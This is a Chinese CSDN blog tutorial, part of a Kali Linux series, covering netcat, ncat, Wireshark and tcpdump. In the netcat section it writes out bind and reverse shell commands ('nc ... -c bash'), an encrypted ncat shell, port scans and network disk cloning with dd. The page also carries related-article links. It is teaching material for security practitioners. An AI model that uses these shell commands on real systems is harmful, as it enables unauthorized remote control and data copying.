Kali Linux 从入门到精通(六)-基本工具使用

最新推荐文章于 2024-04-01 09:12:23 发布
最新推荐文章于 2024-04-01 09:12:23 发布
阅读量1.8w 收藏 234
点赞数 15
分类专栏: >> Kali Linux ▼ 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33592583/article/details/85638912
版权

Kali Linux 从入门到精通(六)-基本工具使用

基本工具

  • 常用工具:
    • 经常使用且功能强大
    • 安全从业者必不可少的帮手
    • Nc/ncat
    • Wireshark
    • Tcpdump

NETCAT-NC(瑞士军刀)

  • 基本介绍
    • 网络工具中的瑞士军刀-小身材,大智慧
    • 侦听模式/传输模式
    • telnet/获取banner模式
    • 传输文本信息
    • 传输文件/目录
    • 加密传输文件
    • 远程控制/木马
    • 加密所用流量
    • 流媒体服务器
    • 远程克隆硬盘
  • 一波操作
    • NC-TELNET/BANNER
      • nc-nv 1.1.1.1 110 (pop3 服务器)
      • nc-nv 1.1.1.1 25 (smtp 邮件服务器)
      • nc-nv 1.1.1.1 80 (网站)
      • nc -h 查看nc可用参数
    • NC-传输文本信息
      • A:nc -l -p 4444(打开4444端口) 使用netstat -pantu | grep 4444 查看端口是否打开
      • B:nc -nv 1.1.1.1 4444
      • nc -q 传输后直接断连接
      • 远程电子取证信息收集
    • NC-传输文件/目录
      • 传输文件
        • A:nc -lp 333>test.mp4
        • B:nc -nv 1.1.1.1 333 < test.mp4 -q 1
        • or
        • A: nc-q l -lp 333<a.mp4
        • B: nc-nv 1.1.1.1 333>2.mp4
      • 传输目录
        • A:tar -cvf -music/ | nc-lp 333 -q 1
        • B:nc -nv 1.1.1.1 333 | tar -xvf -
      • 加密传文件
        • A:nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
        • B:mcrypt --flush -Fbq -a rjindael-256-m ecb <a.mp4 | nc -nv 1.1.1.1 333 -q 1(对称加密算法)
    • NC-流媒体服务
      • A:cat 1.mp4 | nc -lp 333
      • B:nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
    • NC-端口扫描
      • nc -nvz 1.1.1.1-65535 (探测tcp端口)
      • nc -nvzu 1.1.1.1-1024 (探测udp端口)
    • NC-远程克隆硬盘
      • A(接收端):nc -lp 333 | dd of=/dev/sda
      • B(被取证电脑):dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
      • 远程电子取证,可以将目标服务器远程复制,或者内存
    • NC-远程控制
      • 正向:
        • A(服务器):nc -lp 333 -c bash
        • B(客户端):nc 1.1.1.1 333
      • 反向:
        • A:nc -lp 333
        • B:nc 1.1.1.1 333 -c bash
      • 注:windows用户把bash改成cmd
      • 适用于内网访问外网
    • NC-NCAT

      • NC缺乏加密和身份验证(肉鸡可能被窃取)的能力

      • Ncat包含于nmap工具包中(可实现加密,身份验证,每次会重新生成指纹信息)

      • A:ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl

      • B:ncat -nv 1.1.1.1 333 --ssl

      • 不同系统/平台的nc参数功能不尽相同

WIRESHARK(后续补充)-被动扫描大法

  • 基本介绍
    • 抓包嗅探协议分析
    • 安全专家必备的技能
    • 抓包引擎
      • Libcap9----Linux
      • Winpcap10—Windows
    • 解码能力(评价之根本)
  • 基本使用方法
    • 启动
    • 选择抓包网卡
    • 混杂模式
    • 实时抓包
    • 保存和分析捕获文件
    • 首选项
  • WIRESHARK-筛选器
    • 过滤掉干扰的数据包
    • 抓包筛选器
    • 显示筛选器
  • WIRESHARK-常见协议包
    • 数据的分层结构
    • ARP
    • ICMP
    • TCP(三次握手)
    • UDP
    • DNS
    • HTTP(明文协议)
    • FTP
  • WIRESHARK-TCP
    • 数据流
      • HTTP
      • SMTP
      • POP3
      • SSL
  • WIRESHARK-信息统计
    • 节点数
    • 协议分布
    • 包大小分布
    • 会话连接
    • 解码方式
    • 专家系统
  • WIRESHARK-实践
    • 抓包对比nc,ncat加密与不加密的流量
    • 企业抓包部署方案(采用商业化软件)
      • Sniffer
      • Cace/riverebed (底层基于wireshark)
      • Cascad pilot(大流量抓包++)
      • 镜像端口(Cisco)

TCPDUMP

  • 基本介绍
    • No-GUI的抓包分析工具
    • Linux,Unix系统默认安装
  • TCPDUMP-抓包
    • 抓包
      • 默认只抓68个字节
      • tcpdump -i eth0 -s 0 -2 file.pcap
      • tcpdump -i eth0 port 22
    • 读取抓包文件
      • tcpdump -r file.pcap
  • TCPDUMP-筛选
    • tcpdump -n http.cap | awk ‘{print $3}’ | sort -u
    • tcpdump -n src host [ip address] -r http.cap
    • tcpdump -n dst host [ip address] -r http.cap
    • tcpdump -n port 53 -r http.cap
    • tcpdump -nX port 80 -r http.cap
  • TCP 高级筛选
    • tcpdump -A -n ‘tcp[13]=24’ -r http.cap
  • 过程文档记录
    • Dradis(Kali 自带)
      • 短期临时小团队资源共享
      • 各种插件导入问价
    • Keepnote
    • Truecrypt(注重信息保密)
    • 团队中需要文档人员
<-krush->
关注
  • 15
    点赞
  • 234
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
kali概述
qq_64729725的博客
11-25 1万+
kali安全工具
KALI
03-17
Windows2019RDP-US 具有RDP访问权限的Windows Server 2019 Github(ngrok AP)存储库链接: : 使用Github使用2cpu-7gb Ram FREE创建免费的VPS: 单击屏幕右上角的Fork将其保存到您的Github。 访问以获取NGROK_AUTH_TOKEN 在Github中转到“设置”>“秘密”>“新存储库秘密” 在名称中:输入NGROK_AUTH_TOKEN 价值中:访问复制您的Authtoken并将其粘贴到 按添加秘密 转到“操作”>“ CI”>“运行工作流” 重新加载页面,然后按CI> build 按“连接到RPD”上的向下箭头以获取IP,用户,密码。
kali-linux工具包官方使用教程
03-06
kali-linux工具包官方使用教程,kali各个工具使用教程
Kali Linux 从入门到精通(三)-入侵系统定制
https://github.com/Wheeeeeeeeels
01-02 8607
Kali Linux 从入门到精通(三)-入侵系统定制 定制 网络配置 临时IP地址 dhclient eth0 ifconfig eth0 192.168.11/24 route add default gw 192.168.1.1 # 添加默认网关 echo nameserver 192.168.1.1 &gt; /etc/resolv.conf 固定IP地址(计算机重启后依...
2024年最新kali安装教程(超详细,图文并茂)
最新发布
sdhswddlj的博客
04-01 6413
2024最新kali安装教程
kali的新手教程
2201_76048337的博客
06-24 5325
众所周知,黑客不会玩KALI都是假黑客,那么现在我来 教大家KALI的新手教程吧!这里,我盘点了一些KALI常用的代码KALI中的ROOT权限与Windows中的管理员权限类似,进入以后,你的行为成功性会扩大打开KALI 打开终端输入: 接着,输入: 出现以下画面: 按住下键,找到“kali"选项 按”i“键进入插入模式,将参数的两个1000调成0 按Esc键退出插入模式,按shift+两个z保存退出输入reboot重启即可输入: 出现以下画面: 按住下键,找到zh_CN.UTF-8
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用kali-linux-2022.2-vmware-amd64.part1.rar https://download.csdn.net/download/weixin_43800734/85641785 kali-linux-2022.2-vmware-amd64.part2.rar https://download.csdn.net/download/weixin_43800734/85641792 kali-linux-2022.2-vmware-amd64.part3.rar https://download.csdn.net/download/weixin_43800734/85641844 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。预装了许多渗透测试软件,包括nmap 、Wireshark 、Sqlmap等。
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用kali-linux-2022.2-vmware-amd64.part1.rar https://download.csdn.net/download/weixin_43800734/85641785 kali-linux-2022.2-vmware-amd64.part2.rar https://download.csdn.net/download/weixin_43800734/85641792 kali-linux-2022.2-vmware-amd64.part3.rar https://download.csdn.net/download/weixin_43800734/85641844 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。预装了许多渗透测试软件,包括nmap 、Wireshark 、Sqlmap等。
KaliLinux安全渗透教程(完整版)
04-26
第 1 章 Lin u x 安 全 渗 透 简 介 1.1 什 么 是 安 全 渗 透 1.2 安 全 渗 透 所 需 的 工 具 1.3 K ali Lin u x 简 介 1.4 安 装 K ali Lin u x 1.5 K ali更 新 与 升 级 1.6 基 本 设 置 第 2 章 配 置 K ali Lin u x 2.1 准 备 内 核 头 文 件 2.2 安 装 并 配 置 N VIDIA 显 卡 驱 动 2.3 应 用 更 新 和 配 置 额 外 安 全 工 具 2.4 设 置 P r o x y C h ain s 2.5 目 录 加 密 第 3 章 高 级 测 试 实 验 室 3.1 使 用 V M w a r e W o r k s t a tio n 3.2 攻 击 W o r d P r e s s 和 其 他 应 用 程 序 第 4 章 信 息 收 集 4.1 枚 举 服 务 4.2 测 试 网 络 范 围 4.3 识 别 活 跃 的 主 机 4.4 查 看 打 开 的 端 口 4.5 系 统 指 纹 识 别 4.6 服 务 的 指 纹 识 别 4.7 其 他 信 息 收 集 手 段 4.8 使 用 M alt e g o 收 集 信 息 4.9 绘 制 网 络 结 构 图 第 5 章 漏 洞 扫 描 5.1 使 用 N e s s u s 5.2 使 用 O p e n VA S 第 6 章 漏 洞 利 用 6.1 M e t a s ploit a ble 操 作 系 统 6.2 M e t a s ploit 基 础 6.3 控 制 M e t e r p r e t e r 6.4 渗 透 攻 击 应 用 大 学 霸 K ali Lin u x 安 全 渗 透 教 程 2 6.5 7 7.1 7.2 7.3 7.4 8 8.1 8.2 8.3 8.4 8.5 8.6 8.7 8.8 8.9 9 9.1 9.2 9.3 9.4 9.5 9.6 9.7 9.8 6.5 免杀Payload生成工具Veil 第7章 权限提升 7.1 使用假冒令牌 7.2 本地权限提升 7.3 使用社会工程学工具包(SET) 7.4 使用SET实施攻击 第8章 密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 绕过Utilman登录 8.5 破解纯文本密码工具mimikatz 8.6 破解操作系统用户密码 8.7 创建密码字典 8.8 使用NVIDIA计算机统一设备架构(CUDA) 8.9 物理访问攻击 第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上破解无线网络 9.7 攻击路由器 9.8 Arpspoof工具
【2024年最新版】Kali安装详细教程
siu~
08-22 2万+
KALI安装详细过程
【2024版】最新Kali Linux安装教程(非常详细)从零基础入门到精通,看完这一篇就够了(附安装包)
Javachichi的博客
10-28 2万+
在前面的文章中我,我们也写过kali的安装。时间久了,kali的更新也比较快。这里我们以最新版为例,进行安装演示。
kali linux入门及常用简单工具介绍
2301_77815877的博客
05-10 1万+
相信很多同学了解到和学习网络安全的时候都听过kali系统,大家都称之为黑客最喜爱的系统,那么什么是kali,初学者用kali能做些什么,我将在本文中做简单的介绍正如刚才所说,kali里集成了大量的黑客工具和网络安全相关工具,可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-amd64.part4)
06-14
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-i386.ova)文件分割成 4个 压缩包,必须集齐4个 文件后才能一起解压一起使用kali-linux-2022.2-virtualbox-amd64.part1 https://download.csdn.net/download/weixin_43800734/85642262 kali-linux-2022.2-virtualbox-amd64.part2 https://download.csdn.net/download/weixin_43800734/85642321 kali-linux-2022.2-virtualbox-amd64.part3 https://download.csdn.net/download/weixin_43800734/85642327 kali-linux-2022.2-virtualbox-amd64.part4 https://download.csdn.net/download/weixin_43800734/85642491
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-amd64.part1)
06-14
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-i386.ova)文件分割成 4个 压缩包,必须集齐4个 文件后才能一起解压一起使用kali-linux-2022.2-virtualbox-amd64.part1 https://download.csdn.net/download/weixin_43800734/85642262 kali-linux-2022.2-virtualbox-amd64.part2 https://download.csdn.net/download/weixin_43800734/85642321 kali-linux-2022.2-virtualbox-amd64.part3 https://download.csdn.net/download/weixin_43800734/85642327 kali-linux-2022.2-virtualbox-amd64.part4 https://download.csdn.net/download/weixin_43800734/85642491
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用kali-linux-2022.2-vmware-amd64.part1.rar https://download.csdn.net/download/weixin_43800734/85641785 kali-linux-2022.2-vmware-amd64.part2.rar https://download.csdn.net/download/weixin_43800734/85641792 kali-linux-2022.2-vmware-amd64.part3.rar https://download.csdn.net/download/weixin_43800734/85641844 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。预装了许多渗透测试软件,包括nmap 、Wireshark 、Sqlmap等。
Kali Linux 从入门到精通(一)-概论
热门推荐
https://github.com/Wheeeeeeeeels
01-02 4万+
Kali Linux 从入门到精通(一)-概论 基本介绍 1.安全目标 先于攻击者发现和防止漏洞出现 攻击型安全 防护型安全 2.渗透测试 尝试挫败安全防御机制,发现系统安全弱点 从攻击者的角度思考,测量安全防护有效性 证明安全问题的存在,而非破坏 道德约束 法律 3.渗透测试标准(The Penetration Testing Execution Standard)...
Linux——kali系统简介及命令
qq_53937309的博客
10-17 4057
kaliLinux的一种,内部包含众多的网络安全相关的软件。用户分为两类:1.管理员用户也是root,管理员用户具有全部权限,可以进行任意的操作。2.普通用户,新建的用户都是普通用户,权限非常低。
Kali 2023年最新版下载安装最全流程&功能介绍(内附安装包)
ZL_1618的博客
09-06 2091
1.描述Kali Linux是一个操作系统(2013-03-13诞生)基于Debian Linux的发行版基于包含了约600个安全工具(- 省去了繁琐的安装、编译、配置、更新步骤)(- 为所有工具运行提供了一个稳定一致的操作系统基础)它的前身是BackTrack官方机构Offensive Security目前最新版本2.特点永远开源免费支持多种无线网卡,定制内核支持无线注入支持 手机/PAD/ARM 平台高度可定制更新频繁(Rolling)(- 最新内核、最新软件、最新特性)
kali的学习
m0_64180167的博客
08-28 4976
首先我们了解kali的网络设置。
kali-linux-2021.4-vmware-amd64
12-16
kali-linux-2021.4-vmware-amd64是一款基于Debian的Linux发行版,专为数字取证和渗透测试而设计。它包含了大量的渗透测试工具,可以帮助安全专家和渗透测试人员评估系统的安全性。 这个版本是专门为虚拟化环境而设计的,可以在VMware虚拟机中运行,适用于AMD64架构。这意味着用户可以在自己的计算机上运行Kali Linux而无需对硬件做出改变。 Kali Linux 2021.4带来了一系列更新和改进,包括更新了大量的工具和软件包,改进了系统性能,增强了硬件兼容性,并修复了之前版本中的一些bug。它还包括了新的功能和改进,以使渗透测试和数字取证工作更加高效和方便。 用户可以通过下载Kali Linux 2021.4的VMware虚拟机镜像,快速在自己的虚拟化环境中部署和使用。无论是渗透测试人员还是安全专家,都可以通过这个版本的Kali Linux来进行系统安全性评估和漏洞扫描,以及进行数字取证工作。 总而言之,kali-linux-2021.4-vmware-amd64是一款功能强大,更新及时的Linux发行版,专为渗透测试和数字取证而设计,适用于在虚拟化环境中运行。它可以为安全相关的工作提供方便和高效的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值